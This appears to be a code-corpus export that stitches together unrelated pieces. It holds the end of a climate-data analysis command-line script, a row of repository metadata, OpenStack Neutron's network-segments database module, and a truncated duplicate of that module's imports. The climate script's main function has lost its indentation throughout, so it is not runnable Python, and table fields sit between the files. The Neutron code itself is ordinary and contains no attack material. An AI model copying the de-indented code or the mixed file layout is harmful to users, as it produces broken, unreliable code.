    elif len_d == 3:
        day = date_list[2]
        month = date_list[1]
    else:
        print("ERROR in function get_date(): too many split arguments")
        # Bug fix: previously this fell through and returned a bogus
        # default date; fail like the other error paths instead.
        return None
    # Validate that the assembled date is a real calendar date.
    try:
        datetime(year, month, day)
    except ValueError:
        print("ERROR in function get_date(): invalid date")
        return None
    return day, month, year
def user_entry():
parser = argparse.ArgumentParser(prog='CLIMATE_ANALYSIS',
formatter_class=argparse.RawTextHelpFormatter,
description="""The functions will give statistical analysis of the climate data
presented
FILENAMES FORMAT
----------------
- The filenames should be in the format "{START OF FILENAME}_ens{NUM}_{YEAR}.nc", where {START OF FILENAME} is
the prefix of the file, this can be the algae type etc, {NUM} is the ensemble number and {YEAR} is the year.
OR if you have multiple years stored in one file then:
- The filenames should be in the format "{START OF FILENAME}_ens{NUM}_{YEAR 1}_{YEAR 2}.nc", where
{START OF FILENAME} is the prefix of the file, this can be the algae type etc, {NUM} is the ensemble number and
{YEAR 1} and {YEAR 2} are the start and end year of the data in the file.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ASSUMPTIONS
------------
- Files do not have overlapped data.
- Daily increments of data, except if the monthly tag is set in the arguments.
- Grids have constant latitude and longitude.
------------
- Some example files are in the data folder.
""")
parser._optionals.title = "other arguments"
parser.add_argument('-pf', '--prefix', nargs='+', required=True, help="<Required> This is the prefix of the file - in the filenames format section, this is the START OF FILENAME.")
parser.add_argument('start_date', nargs='+', help="""Start date of analysis
Can be in the following formats:
----------------------------------
YYYY-MM-DD : e.g. 2020-04-12
YYYY-MM : e.g. 2020-04
YYYY : e.g. 2020
- If day is not given, the 1st of the given month will be used i.e 2020-04 => 2020-04-01
- If day and month is not given, 1st Jan will be used as the start date i.e 2020 => 2020-01-01""")
parser.add_argument('-end', '--end_date', nargs='*', help=""" <Not required> End date of analysis - format is the same as start_date
-----------------------------------end_date not given-------------------------------------
- If only start year is given, the end_date is automatically set to the 31 Dec of start year
- If start year and month is given, then end_date is set to the end of the start month
-----------------------------------end_date given-------------------------------------
- If day is not given, the end of the given month will be used i.e 2020-04 => 2020-04-30
- If day and month is not given, 31 Dec will be used as the end date i.e 2020 => 2020-12-31""")
parser.add_argument('-v', '--vars', nargs='+', metavar="variables", help="<Required> Variables of data to analyse",
required=True)
parser.add_argument('-p', '--plot', nargs=1, metavar=("ensemble_number"), help="""Plot map, histogram and timeseries graphs
E.g. --plot 1
The ensemble to plot must be included. """)
parser.add_argument('-m', '--monthly', action="store_true", help="Data in file is stored in monthly increments.")
group = parser.add_mutually_exclusive_group()
group.add_argument('-g', '--grid', nargs='+', type=float, metavar=("(lat, lon) or filename or linear/rotate"),
help="""
Grid Point: Latitude, Longitude
Uses grid point that latitude and longitude lies in.
Other commands:
- You can define a list of grid points in a .txt file e.g check INPUT/sample_points.txt
- Grid Point: sample_points.txt
- You can regrid to a grid (using nearest neighbour interpolation) defined in a NETCDF file:
- Grid Point: example_file.nc
Cannot be used in conjunction with sample point.
""")
group.add_argument('-s', '--sample', nargs='+', type=float, metavar=("(lat, lon) or filename or linear/rotate"),
help="""
Sample Point: Latitude, Longitude
Uses sample point given by latitude and longitude using interpolation.
Other commands:
- You can define a list of sample points in a .txt file e.g check INPUT/sample_points.txt
- Sample Point: sample_points.txt
- You can regrid to a grid (using linear interpolation) defined in a NETCDF file:
- Sample Point: example_file.nc
Cannot be used in conjunction with grid point.
""")
group.add_argument('-lc', '--lon_centre', nargs=1, type=float, help="Longitude to centre map on.")
parser.add_argument('-mk', '--mask', nargs=1, metavar="filename", help="Uses masking grid given as a file "
"(contains boolean array to be imposed on "
"the global grid).")
parser.add_argument('-o', '--output', action="store_true", help="If plot option selected, save data output of histogram and timeseries "
"analysis in "
+ directories.ANALYSIS + " as a .dat file.")
parser.add_argument('-cv', '--covary', action="store_true", help="Analysis on how the variables given in -v "
"vary with each other.")
parser.add_argument('-e', '--ens', nargs=1, type=int,
metavar="number_of_ensembles", help="<Required> The number of ensembles of the data. "
"If not set, the default value = 1", required=True)
parser.add_argument('-ht', '--hist', nargs='*',
metavar="number_of_bins_in_histogram", help=" Options for bin size selection. If not set, the "
"default value = fd (Freedman "
"Diaconis Estimator). The list of the potential "
"options are listed in: \n"
"https://docs.scipy.org/doc/numpy/reference/generated/numpy.histogram_bin_edges.html#numpy.histogram_bin_edges")
parser.add_argument('-u', '--user', nargs=2, metavar=('file_name', 'function_name'),
help="""Use function written by the user and stored in user_function folder for analysis.
file_name : name of file that contains function in user_function folder
function_name : name of function to call
Note: user functions are expected to only take in a cube as an argument. An example of a function
can be found in user_function/example_function.py
""")
parser.add_argument('-a', '--analysis', nargs='+', help="""Analysis performed on data set.
If not specified, then all analysis listed below will be performed.
Types of analysis:
- mean
- std (Standard deviation)
- rms (Root mean squared error)
- median
You can also select a combination of analysis to perform e.g. -a mean rms """)
parser.add_argument('-sp', '--spatial', action="store_true", help="Calculates averages spatially.")
parser.add_argument('-ca', '--areas', action="store_true", help="Calculate areas of grid boxes of latitude and"
" longitude and saves to NetCDF file areas.nc in results folder")
parser.add_argument('-t', '--total', action="store_true",
help="""Total ensemble stats: True/False : The analysis will be performed over the whole ensemble given.
- If set True, all the ensembles will be averaged as a collection.
- If set False, the ensembles will be averaged individually.""")
parser.add_argument('-i', '--index', metavar=('index'),
help="""Calculate index given
The control run is the FIRST file prefix set and the corresponding start/end date.
The future run is the SECOND file prefix set and the corresponding second start/end date
Types of inidices that can be calculated:
enso : The Oceanic Niño Index (ONI)
nino12 : Niño 1+2 Index
nino4 : Niño 4 Index
tni : The Trans-Niño Index (TNI)
iod : Indian Ocean Dipole (IOD) Mode Index
amo : Atlantic Multidecadal Oscillation (AMO) Index
pdo : Pacific Decadal Oscillation (PDO) Index
ao : Arctic Oscillation (AO; Northern Annular Mode) Index
aao : Antarctic Oscillation (AAO; Southern Annular Mode) Index
nao : North Atlantic Oscillation (NAO) Index
""")
old_stdout = sys.stdout
log_file = open("output.log", "w")
sys.stdout = log_file
progress = ProgressBar(description='Climate Modelling software output', n_iter=5)
algae_type, start, varbs, ens, end, analysis, spatial, total = None, None, None, None, None, None, None, None
plot, monthly, grid, sample, mask, output, covary, hist = None, None, None, None, None, None, None, None
lon_centre, func, calc_areas, index, lat, lon, points_sample_grid = None, None, None, None, None, None, None
second_date_given, start2, end2 = False, None, None
if len(sys.argv) == 1:
algae_type, start, varbs, ens, end, analysis, spatial, total, plot, monthly, grid, sample, mask, output, covary, hist, lon_centre, func, calc_areas, index = file_entry()
elif len(sys.argv) == 2 and (sys.argv[1] == '-ex' or sys.argv[1] == '--example'):
algae_type, start, varbs, ens, end, analysis, spatial, total, plot, monthly, grid, sample, mask, output, covary, hist, lon_centre, func, calc_areas, index = file_entry(example=True)
else:
args = parser.parse_args()
algae_type = args.prefix
start = args.start_date
varbs = args.vars
ens = args.ens[0]
end = args.end_date
analysis = args.analysis
spatial = args.spatial
total = args.total
plot = args.plot
monthly = args.monthly
grid = args.grid
sample = args.sample
mask = args.mask
output = args.output
covary = args.covary
hist = args.hist
lon_centre = args.lon_centre
func = args.user
calc_areas = args.areas
index = args.index
progress.update()
argv = 'python main.py'
argv = argv + ' ' + start[0]
if len(start) == 2:
argv = argv + start[1]
argv = argv + ' -pf ' + algae_type[0]
if len(algae_type) == 2:
argv = argv + ' ' + algae_type[1]
if end:
argv = argv + ' -end ' + end[0]
if len(end) == 2:
argv = argv + ' ' + end[1]
av = ' '.join(varbs)
argv = argv + ' -v ' + av + ' -e ' + str(ens)
if end and len(start) < len(end):
print("ERROR in function user_entry: Start dates are required.")
sys.exit()
if len(algae_type) > 2:
print("ERROR in function user_entry: Too many arguemnts given for 'Prefix' argument.")
sys.exit()
if spatial and not analysis:
print("Error in function user_entry: Spatial argument cannot be set when no analysis is selected.")
sys.exit()
day_s, mon_s, yr_s, day_e, mon_e, yr_e = None, None, None, None, None, None
day_s2, mon_s2, yr_s2, day_e2, mon_e2, yr_e2 = None, None, None, None, None, None
if len(start) == 1:
day_s, mon_s, yr_s = get_date(start[0])
if not end:
if StartBools.just_start_year:
end = str(yr_s)
elif StartBools.just_start_year_month:
end = str(yr_s) + "-" + str(mon_s)
else:
end = end[0]
day_e, mon_e, yr_e = get_date(end, start=False)
if len(start) == 2 and len(end) != 2:
print("ERROR in function user_entry: Both end dates must be given with both start dates.")
sys.exit()
if len(start) == 2:
second_date_given = True
StartBools.just_start_year, StartBools.just_start_year_month = False, False
day_s, mon_s, yr_s = get_date(start[0])
fst_end = end[0]
day_e, mon_e, yr_e = get_date(fst_end, start=False)
day_s2, mon_s2, yr_s2 = get_date(start[1])
end = end[1]
day_e2, mon_e2, yr_e2 = get_date(end, start=False)
elif len(start) > 2:
print("ERROR in function user_entry: Too many arguemnts given for 'Start date' argument.")
sys.exit()
print("Arguments:")
if len(algae_type) == 1:
print("- file prefix: ", algae_type[0])
if len(algae_type) == 2:
print("- first file prefix: ", algae_type[0])
print("- second file prefix: ", algae_type[1])
print("- variables: ", varbs)
print("- start date: " + str(yr_s) + "-" + str(mon_s) + "-" + str(day_s))
print("- end date: " + str(yr_e) + "-" + str(mon_e) + "-" + str(day_e))
if second_date_given:
print("- second start date: " + str(yr_s2) + "-" + str(mon_s2) + "-" + str(day_s2))
print("- second end date: " + str(yr_e2) + "-" + str(mon_e2) + "-" + str(day_e2))
is_valid = check_valid_order([day_s, mon_s, yr_s], [day_e, mon_e, yr_e])
if not is_valid:
print("ERROR in function user_entry: Invalid start and end date")
print(" - The end date is earlier than the start date")
sys.exit()
if second_date_given:
is_valid = check_valid_order([day_s2, mon_s2, yr_s2], [day_e2, mon_e2, yr_e2])
if not is_valid:
print("ERROR in function user_entry: Invalid second start and second end date")
print(" - The end date is earlier than the start date")
sys.exit()
print("Number of ensembles:", ens)
if analysis:
print("Analysis: ", analysis)
a_ = ' '.join(analysis)
argv = argv + ' -a ' + a_
check_analysis(analysis)
if spatial:
print("Spatial analysis option selected.")
argv = argv + ' -sp'
if total:
print("Total ensemble stats option selected.")
argv = argv + ' -t'
if plot:
print("Plotting option selected.")
argv = argv + ' -p ' + str(plot[0])
else:
plot = None
if monthly:
print("Monthly date expected.")
argv = argv + ' -m'
if grid:
if len(grid) == 2:
lat, lon = grid[0], grid[1]
print("Grid point option selected.")
argv = argv + ' -g ' + str(grid[0]) + ' ' + str(grid[1])
elif len(grid) == 1:
check_sample_grid_one_arg(grid, 'user_entry')
points_sample_grid = grid[0]
print("Grid point option selected.")
argv = argv + ' -g ' + str(grid[0])
else:
print("ERROR in function user_entry: Grid point argument has invalid number of arguments.")
sys.exit()
elif sample:
if len(sample) == 2:
lat, lon = sample[0], sample[1]
print("Sample point option selected.")
argv = argv + ' -s ' + str(sample[0]) + ' ' + str(sample[1])
elif len(sample) == 1:
check_sample_grid_one_arg(sample, 'user_entry')
points_sample_grid = sample[0]
print("Sample point option selected.")
argv = argv + ' -s ' + str(sample[0])
else:
print("ERROR in function user_entry: Sample point argument has invalid number of arguments.")
sys.exit()
if mask:
if isinstance(mask, list):
mask = mask[0]
print("Masking grid option selected.")
argv = argv + ' -mk ' + mask
elif not mask:
mask = None
if output:
print("Save analysis data output selected.")
argv = argv + ' -o'
if covary:
print("Co-varying option selected.")
argv = argv + ' -cv'
check_variables_covary(varbs)
if not hist:
hist = ['fd']
elif hist:
argv = argv + ' -ht ' + str(hist[0])
if len(hist) == 2:
argv = argv + ' ' + str(hist[1])
elif len(hist) > 2:
print("ERROR in function user_entry: Histogram argument has invalid number of arguments.")
sys.exit()
print("Histogram bin selection option:", hist)
if func:
print("User function given: " + str(func[0]) + ", " + str(func[1]))
argv = argv + ' -u ' + func[0] + ' ' + func[1]
if calc_areas:
print("Calculate areas option selected.")
argv = argv + ' -ca'
if index and not second_date_given:
print("ERROR in function user_entry: Index must be given with a second start date set.")
sys.exit()
if index:
print("Index option selected: " + index)
argv = argv + ' -i'
if lon_centre:
lon_centre = lon_centre[0]
print("Longitude centering option selected.")
argv = argv + ' -lc ' + str(lon_centre)
elif not lon_centre:
lon_centre = None
start = [day_s, mon_s, yr_s]
end = [day_e, mon_e, yr_e]
if second_date_given:
start2 = [day_s2, mon_s2, yr_s2]
end2 = [day_e2, mon_e2, yr_e2]
progress.update()
if index:
calculate_index(algae_type, index, varbs, start, end, start2, end2, monthly=monthly, test=True)
progress.update()
progress.finish()
sys.exit()
extract = Extract(algae_type[0], varbs, start, end, ens, monthly=monthly, lat=lat, lon=lon, grid=grid,
points_sample_grid=points_sample_grid,
lon_centre=lon_centre, maskfile=mask,
calc_areas=calc_areas)
saved, ens_files, abs_files, full_saved, dim_coords = extract.extract_data()
saved2, ens_files2, abs_files2, full_saved2 = None, None, None, None
if second_date_given:
at = None
if len(algae_type) == 2:
at = algae_type[1]
else:
at = algae_type[0]
extract = Extract(at, varbs, start2, end2, ens, monthly=monthly, lat=lat, lon=lon, grid=grid,
points_sample_grid=points_sample_grid,
lon_centre=lon_centre, maskfile=mask,
calc_areas=calc_areas)
saved2, ens_files2, abs_files2, full_saved2, _ = extract.extract_data()
progress.update()
anlys = Analysis(saved)
ens_stats, func_name, analysis_str, nan_indices = None, None, None, None
spat_calcs, spat_calcs2 = None, None
ens_stats2 = None
if func:
file_name, func_name = func[0], func[1]
ens_stats = anlys.compute_user_analysis(file_name, func_name)
else:
if second_date_given:
ens_stats, spat_calcs, spat_calcs2, analysis_str, nan_indices= anlys.calc_stats_difference(saved2, analysis, total=total,
spatial=spatial, dim_coords=dim_coords)
else:
ens_stats, analysis_str, nan_indices = anlys.compute_stats_analysis(analysis, total=total,
spatial=spatial, dim_coords=dim_coords)
if mask is not None and lat is not None:
print("WARNING: Please ensure that sample/grid point is in the masked region.")
progress.update()
try:
if plot is not None or output:
plot_ens_num = int(plot[0]) if plot is not None else 1
create_histogram(saved, ens_stats, start, end, varbs, sel=hist, monthly=monthly,
save_out=output, ens_num=plot_ens_num, cov=covary, mask=mask,
total=total, analysis_str=analysis_str, nan_indices=nan_indices, plot=plot,
second_date_given=second_date_given, start_date2=start2, end_date2=end2, spatial=spatial)
if plot is not None:
if analysis_str:
if func is None or not func:
plot_map_analysis(ens_stats, varbs, save_out=output, ens_num=plot_ens_num,
analysis_str=analysis_str, total=total,
second_date_given=second_date_given)
else:
print("WARNING: Map not plotted as user function is used.")
else:
plot_map(saved, varbs, save_out=output, ens_num=plot_ens_num, total=total,
second_date_given=second_date_given)
if analysis_str:
create_timeseries_analysis(ens_stats, start, end, varbs, analysis_str, monthly=monthly,
save_out=output, ens_num=plot_ens_num,
second_date_given=second_date_given, total=total, spatial=spatial,
calcs=spat_calcs, calcs2=spat_calcs2, plot=plot, start2=start2, end2=end2)
else:
create_timeseries(saved, start, end, varbs,
save_out=output, ens_num=plot_ens_num, func_name=func_name, monthly=monthly,
second_date_given=second_date_given, plot=plot)
progress.update()
except Exception as err:
print("Exception thrown in function user_entry when plotting: " + str(err))
if output:
wo = WriteOutput(ens_files, abs_files, ens_stats, analysis_str, varbs,
start, end, argv, saved, full_saved,
total=total, lon_centre=lon_centre,
mask=mask, lon=lon, lat=lat,
grid=grid, user_func=func_name,
points_sample_grid=points_sample_grid,
second_date_given=second_date_given, test=True)
wo.write_analysis_to_netcdf_file()
progress.update()
print("PROGRAM SUCCESSFUL - TERMINAL FINISHED.")
sys.stdout = old_stdout
log_file.close()
progress.finish()
print_end_statement()
if plot is not None:
plt.show()
| true | true |
f725eaa93df16bb582f142e4fc6adc97b25e4daf | 15,232 | py | Python | neutron/services/segments/db.py | knodir/neutron | ac4e28478ac8a8a0c9f5c5785f6a6bcf532c66b8 | [
"Apache-2.0"
] | null | null | null | neutron/services/segments/db.py | knodir/neutron | ac4e28478ac8a8a0c9f5c5785f6a6bcf532c66b8 | [
"Apache-2.0"
] | 5 | 2019-08-14T06:46:03.000Z | 2021-12-13T20:01:25.000Z | neutron/services/segments/db.py | knodir/neutron | ac4e28478ac8a8a0c9f5c5785f6a6bcf532c66b8 | [
"Apache-2.0"
] | 2 | 2020-03-15T01:24:15.000Z | 2020-07-22T20:34:26.000Z | # Copyright 2016 Hewlett Packard Enterprise Development, LP
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.callbacks import events
from neutron_lib.callbacks import registry
from neutron_lib.callbacks import resources
from neutron_lib import constants
from neutron_lib.db import api as db_api
from neutron_lib.db import resource_extend
from neutron_lib.db import utils as db_utils
from neutron_lib import exceptions as n_exc
from neutron_lib.plugins import directory
from oslo_concurrency import lockutils
from oslo_config import cfg
from oslo_db import exception as db_exc
from oslo_log import helpers as log_helpers
from oslo_utils import uuidutils
from neutron.db import common_db_mixin
from neutron.db import segments_db as db
from neutron.extensions import segment as extension
from neutron import manager
from neutron.objects import base as base_obj
from neutron.objects import network
from neutron.services.segments import exceptions
_USER_CONFIGURED_SEGMENT_PLUGIN = None
def check_user_configured_segment_plugin():
    """Return whether the operator enabled the 'segments' service plugin.

    The answer is computed once at first call and memoized in the module
    global ``_USER_CONFIGURED_SEGMENT_PLUGIN``:

    * ``None``  -- not yet evaluated (neutron-server startup);
    * ``True``  -- 'segments' (alias or class path) is in service_plugins;
    * ``False`` -- it is not configured.
    """
    global _USER_CONFIGURED_SEGMENT_PLUGIN
    if _USER_CONFIGURED_SEGMENT_PLUGIN is None:
        # The plugin may be referenced either by its alias or by its
        # fully qualified class path.
        known_aliases = (
            'segments',
            'neutron.services.segments.plugin.Plugin',
        )
        configured = cfg.CONF.service_plugins
        _USER_CONFIGURED_SEGMENT_PLUGIN = any(
            alias in configured for alias in known_aliases)
    return _USER_CONFIGURED_SEGMENT_PLUGIN
class SegmentDbMixin(common_db_mixin.CommonDbMixin):
    """Mixin class adding CRUD support for network segments."""

    @staticmethod
    def _make_segment_dict(segment_obj, fields=None):
        """Serialize a NetworkSegment object into an API response dict.

        Registered resource extensions may append their own keys before
        the dict is filtered down to the requested ``fields``.
        """
        res = {'id': segment_obj['id'],
               'network_id': segment_obj['network_id'],
               'name': segment_obj['name'],
               'description': segment_obj['description'],
               db.PHYSICAL_NETWORK: segment_obj[db.PHYSICAL_NETWORK],
               db.NETWORK_TYPE: segment_obj[db.NETWORK_TYPE],
               db.SEGMENTATION_ID: segment_obj[db.SEGMENTATION_ID],
               'hosts': segment_obj['hosts'],
               'segment_index': segment_obj['segment_index']}
        # Let extension drivers registered for 'segments' extend the dict.
        resource_extend.apply_funcs('segments', res, segment_obj.db_obj)
        return db_utils.resource_fields(res, fields)

    def _get_segment(self, context, segment_id):
        """Fetch a segment object by id, raising SegmentNotFound if absent."""
        segment = network.NetworkSegment.get_object(context, id=segment_id)
        if not segment:
            raise exceptions.SegmentNotFound(segment_id=segment_id)
        return segment

    @log_helpers.log_method_call
    def create_segment(self, context, segment):
        """Create a segment.

        :param segment: request body of the form {'segment': {...}}.
        :returns: the created segment serialized as a dict.
        :raises NetworkNotFound: if the referenced network does not exist.
        """
        segment = segment['segment']
        segment_id = segment.get('id') or uuidutils.generate_uuid()
        try:
            new_segment = self._create_segment_db(context, segment_id, segment)
        except db_exc.DBReferenceError:
            # A foreign-key violation here means the target network is gone.
            raise n_exc.NetworkNotFound(net_id=segment['network_id'])
        registry.notify(resources.SEGMENT, events.AFTER_CREATE, self,
                        context=context, segment=new_segment)
        return self._make_segment_dict(new_segment)

    def _create_segment_db(self, context, segment_id, segment):
        """Persist a new segment inside a single writer transaction."""
        with db_api.CONTEXT_WRITER.using(context):
            network_id = segment['network_id']
            physical_network = segment[extension.PHYSICAL_NETWORK]
            # Normalize the "attribute not specified" sentinel to None
            # for every optional field.
            if physical_network == constants.ATTR_NOT_SPECIFIED:
                physical_network = None
            network_type = segment[extension.NETWORK_TYPE]
            segmentation_id = segment[extension.SEGMENTATION_ID]
            if segmentation_id == constants.ATTR_NOT_SPECIFIED:
                segmentation_id = None
            name = segment['name']
            if name == constants.ATTR_NOT_SPECIFIED:
                name = None
            description = segment['description']
            if description == constants.ATTR_NOT_SPECIFIED:
                description = None
            args = {'id': segment_id,
                    'network_id': network_id,
                    'name': name,
                    'description': description,
                    db.PHYSICAL_NETWORK: physical_network,
                    db.NETWORK_TYPE: network_type,
                    db.SEGMENTATION_ID: segmentation_id}
            # Calculate the index of segment
            segment_index = 0
            segments = self.get_segments(
                context,
                filters={'network_id': [network_id]},
                fields=['segment_index'],
                sorts=[('segment_index', True)])
            if segments:
                # NOTE(xiaohhui): The new index is the last index + 1, this
                # may cause discontinuous segment_index. But segment_index
                # can functionally work as the order index for segments.
                segment_index = (segments[-1].get('segment_index') + 1)
            args['segment_index'] = segment_index
            new_segment = network.NetworkSegment(context, **args)
            new_segment.create()
            # Do some preliminary operations before committing the segment to
            # db
            registry.notify(
                resources.SEGMENT, events.PRECOMMIT_CREATE, self,
                context=context, segment=new_segment)
            # The new segment might have been updated by the callbacks
            # subscribed to the PRECOMMIT_CREATE event. So update it in the DB
            new_segment.update()
            return new_segment

    @log_helpers.log_method_call
    def update_segment(self, context, uuid, segment):
        """Update an existing segment."""
        segment = segment['segment']
        with db_api.CONTEXT_WRITER.using(context):
            curr_segment = self._get_segment(context, uuid)
            curr_segment.update_fields(segment)
            curr_segment.update()
            return self._make_segment_dict(curr_segment)

    @log_helpers.log_method_call
    def get_segment(self, context, uuid, fields=None):
        """Return a single segment as a dict, filtered to ``fields``."""
        segment_db = self._get_segment(context, uuid)
        return self._make_segment_dict(segment_db, fields)

    @log_helpers.log_method_call
    def get_segments(self, context, filters=None, fields=None,
                     sorts=None, limit=None, marker=None,
                     page_reverse=False):
        """List segments matching ``filters`` with optional paging/sorting."""
        filters = filters or {}
        pager = base_obj.Pager(sorts, limit, page_reverse, marker)
        segment_objs = network.NetworkSegment.get_objects(
            context, _pager=pager, **filters)
        return [self._make_segment_dict(obj) for obj in segment_objs]

    @log_helpers.log_method_call
    def get_segments_count(self, context, filters=None):
        """Count segments matching ``filters``."""
        filters = filters or {}
        return network.NetworkSegment.count(context, **filters)

    @log_helpers.log_method_call
    def get_segments_by_hosts(self, context, hosts):
        """Return the distinct segment ids mapped to any of ``hosts``."""
        if not hosts:
            return []
        segment_host_mapping = network.SegmentHostMapping.get_objects(
            context, host=hosts)
        return list({mapping.segment_id for mapping in segment_host_mapping})

    @log_helpers.log_method_call
    def delete_segment(self, context, uuid, for_net_delete=False):
        """Delete an existing segment.

        BEFORE_DELETE is published outside the transaction, the
        PRECOMMIT_DELETE notification fires inside it, and AFTER_DELETE
        is published only once the transaction has committed.
        """
        segment_dict = self.get_segment(context, uuid)
        # Do some preliminary operations before deleting the segment
        registry.publish(resources.SEGMENT, events.BEFORE_DELETE,
                         self.delete_segment,
                         payload=events.DBEventPayload(
                             context, metadata={
                                 'for_net_delete': for_net_delete},
                             states=(segment_dict,),
                             resource_id=uuid))
        # Delete segment in DB
        with db_api.CONTEXT_WRITER.using(context):
            if not network.NetworkSegment.delete_objects(context, id=uuid):
                raise exceptions.SegmentNotFound(segment_id=uuid)
            # Do some preliminary operations before deleting segment in db
            registry.notify(resources.SEGMENT, events.PRECOMMIT_DELETE,
                            self.delete_segment, context=context,
                            segment=segment_dict)
        registry.publish(resources.SEGMENT, events.AFTER_DELETE,
                         self.delete_segment,
                         payload=events.DBEventPayload(
                             context, states=(segment_dict,),
                             resource_id=uuid))
@db_api.retry_if_session_inactive()
@lockutils.synchronized('update_segment_host_mapping')
def update_segment_host_mapping(context, host, current_segment_ids):
    """Reconcile a host's stored segment mappings with the reported set.

    Creates a SegmentHostMapping for every id in ``current_segment_ids``
    that is not yet stored for ``host``, and deletes stored mappings whose
    segment id is no longer reported. Runs as one writer transaction,
    serialized by a process-wide lock.
    """
    with db_api.CONTEXT_WRITER.using(context):
        existing_mappings = network.SegmentHostMapping.get_objects(
            context, host=host)
        known_ids = {mapping['segment_id'] for mapping in existing_mappings}
        # Add mappings that are reported now but not yet stored.
        for new_id in current_segment_ids - known_ids:
            network.SegmentHostMapping(
                context, segment_id=new_id, host=host).create()
        # Drop mappings that are stored but no longer reported.
        obsolete_ids = known_ids - current_segment_ids
        for mapping in existing_mappings:
            if mapping.segment_id in obsolete_ids:
                mapping.delete()
def get_hosts_mapped_with_segments(context):
    """Return the set of host names present in SegmentHostMapping.

    L2 providers can use this method to get an overview of
    SegmentHostMapping, and then delete the stale SegmentHostMapping.
    """
    hosts = set()
    for mapping in network.SegmentHostMapping.get_objects(context):
        hosts.add(mapping.host)
    return hosts
def _get_phys_nets(agent):
configurations_dict = agent.get('configurations', {})
mappings = configurations_dict.get('bridge_mappings', {})
mappings.update(configurations_dict.get('interface_mappings', {}))
mappings.update(configurations_dict.get('device_mappings', {}))
return list(mappings.keys())
# Hosts that have already reported their physnet mappings since this
# server started; lets the agent callback skip recomputation for agents
# that report again without a start_flag.
reported_hosts = set()
# NOTE: Module level variable of segments plugin. It should be removed once
# segments becomes a default plugin.
segments_plugin = None
def get_segments_with_phys_nets(context, phys_nets):
    """Get segments from physical networks.

    L2 providers usually have information of hostname and physical
    networks. They could use this method to get related segments and
    then update SegmentHostMapping.
    """
    physical_networks = list(phys_nets)
    if physical_networks:
        with db_api.CONTEXT_READER.using(context):
            return network.NetworkSegment.get_objects(
                context, physical_network=physical_networks)
    return []
def map_segment_to_hosts(context, segment_id, hosts):
    """Map segment to a collection of hosts.

    Creates one SegmentHostMapping row per host, all within a single
    writer transaction.
    """
    with db_api.CONTEXT_WRITER.using(context):
        for candidate_host in hosts:
            mapping = network.SegmentHostMapping(
                context, segment_id=segment_id, host=candidate_host)
            mapping.create()
def _update_segment_host_mapping_for_agent(resource, event, trigger,
                                           payload=None):
    """Refresh a host's segment mappings when its agent reports in.

    Registered for AGENT AFTER_CREATE/AFTER_UPDATE events. Matches the
    agent's reported physical networks against known segments and then
    reconciles the SegmentHostMapping table for that host.
    """
    plugin = payload.metadata.get('plugin')
    agent = payload.desired_state
    host = payload.metadata.get('host')
    context = payload.context
    check_segment_for_agent = getattr(plugin, 'check_segment_for_agent', None)
    # Nothing to do unless the segments service plugin is enabled and the
    # core plugin knows how to match segments against agents.
    if (not check_user_configured_segment_plugin() or
            not check_segment_for_agent):
        return
    phys_nets = _get_phys_nets(agent)
    if not phys_nets:
        return
    start_flag = agent.get('start_flag', None)
    # Skip hosts already processed in this server's lifetime, unless the
    # agent (re)started, in which case its mappings may have changed.
    if host in reported_hosts and not start_flag:
        return
    reported_hosts.add(host)
    segments = get_segments_with_phys_nets(context, phys_nets)
    current_segment_ids = {
        segment['id'] for segment in segments
        if check_segment_for_agent(segment, agent)}
    update_segment_host_mapping(context, host, current_segment_ids)
    registry.notify(resources.SEGMENT_HOST_MAPPING, events.AFTER_CREATE,
                    plugin, context=context, host=host,
                    current_segment_ids=current_segment_ids)
def _add_segment_host_mapping_for_segment(resource, event, trigger,
                                          context, segment):
    """Map a newly created segment to all hosts whose agents support it.

    Registered for SEGMENT PRECOMMIT_CREATE. Unsubscribes itself when the
    core plugin cannot supply agent information.
    """
    if not context.session.is_active:
        # The session might be in partial rollback state, due to errors in
        # peer callback. In that case, there is no need to add the mapping.
        # Just return here.
        return
    if not segment.physical_network:
        return
    cp = directory.get_plugin()
    check_segment_for_agent = getattr(cp, 'check_segment_for_agent', None)
    if not check_user_configured_segment_plugin() or not hasattr(
            cp, 'get_agents') or not check_segment_for_agent:
        # not an agent-supporting plugin
        registry.unsubscribe(_add_segment_host_mapping_for_segment,
                             resources.SEGMENT, events.PRECOMMIT_CREATE)
        return
    hosts = {agent['host'] for agent in cp.get_agents(context)
             if check_segment_for_agent(segment, agent)}
    map_segment_to_hosts(context, segment.id, hosts)
def _delete_segments_for_network(resource, event, trigger,
                                 context, network_id):
    """Delete every segment of a network as part of network deletion.

    Registered for NETWORK PRECOMMIT_DELETE; runs with elevated (admin)
    privileges so all segments are visible.
    """
    global segments_plugin
    admin_ctx = context.elevated()
    if not segments_plugin:
        # Lazily instantiate the segments service plugin on first use.
        segments_plugin = manager.NeutronManager.load_class_for_provider(
            'neutron.service_plugins', 'segments')()
    net_segments = segments_plugin.get_segments(
        admin_ctx, filters={'network_id': [network_id]})
    for seg in net_segments:
        segments_plugin.delete_segment(admin_ctx, seg['id'],
                                       for_net_delete=True)
def subscribe():
    """Register this module's callbacks with the callback registry."""
    subscriptions = (
        (_update_segment_host_mapping_for_agent,
         resources.AGENT, events.AFTER_CREATE),
        (_update_segment_host_mapping_for_agent,
         resources.AGENT, events.AFTER_UPDATE),
        (_add_segment_host_mapping_for_segment,
         resources.SEGMENT, events.PRECOMMIT_CREATE),
        (_delete_segments_for_network,
         resources.NETWORK, events.PRECOMMIT_DELETE),
    )
    for callback, resource, event in subscriptions:
        registry.subscribe(callback, resource, event)
subscribe()
| 42.311111 | 79 | 0.66787 |
from neutron_lib.callbacks import events
from neutron_lib.callbacks import registry
from neutron_lib.callbacks import resources
from neutron_lib import constants
from neutron_lib.db import api as db_api
from neutron_lib.db import resource_extend
from neutron_lib.db import utils as db_utils
from neutron_lib import exceptions as n_exc
from neutron_lib.plugins import directory
from oslo_concurrency import lockutils
from oslo_config import cfg
from oslo_db import exception as db_exc
from oslo_log import helpers as log_helpers
from oslo_utils import uuidutils
from neutron.db import common_db_mixin
